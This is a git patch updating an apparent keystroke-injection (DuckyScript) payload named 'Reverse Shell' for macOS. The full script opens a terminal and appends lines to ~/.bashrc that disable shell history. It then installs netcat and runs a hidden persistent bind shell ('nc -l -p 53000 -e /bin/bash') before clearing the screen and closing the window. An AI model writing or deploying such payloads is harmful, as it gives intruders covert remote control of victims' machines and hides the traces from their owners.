From 8e94acd08cacadf9f1e6a4ff6a8efec5f706b390 Mon Sep 17 00:00:00 2001 From: Narsty Date: Wed, 21 Jun 2023 23:59:19 -0500 Subject: [PATCH] Update Reverse Shell.txt --- RECON/Reverse Shell.txt | 19 ++++++++++++------- 1 file changed, 12 insertions(+), 7 deletions(-) diff --git a/RECON/Reverse Shell.txt b/RECON/Reverse Shell.txt index 0162c1f..47c08bd 100644 --- a/RECON/Reverse Shell.txt +++ b/RECON/Reverse Shell.txt @@ -36,19 +36,24 @@ DELAY 1000 GUI SPACE DELAY 500 STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash DELAY 500 ENTER -DELAY 1000 -STRING brew install netcat +DELAY 500 +STRING brew install netcat +DELAY 250 ENTER -DELAY 10000 -STRING nohup nc -l -p 53000 -vvv -e /bin/bash & +DELAY 15000 +STRING nohup nc -l -p 53000 -vvv -e /bin/bash & ENTER -DELAY 3500 -STRING clear +DELAY 500 +STRING clear ENTER DELAY 1000 -GUI m +GUI w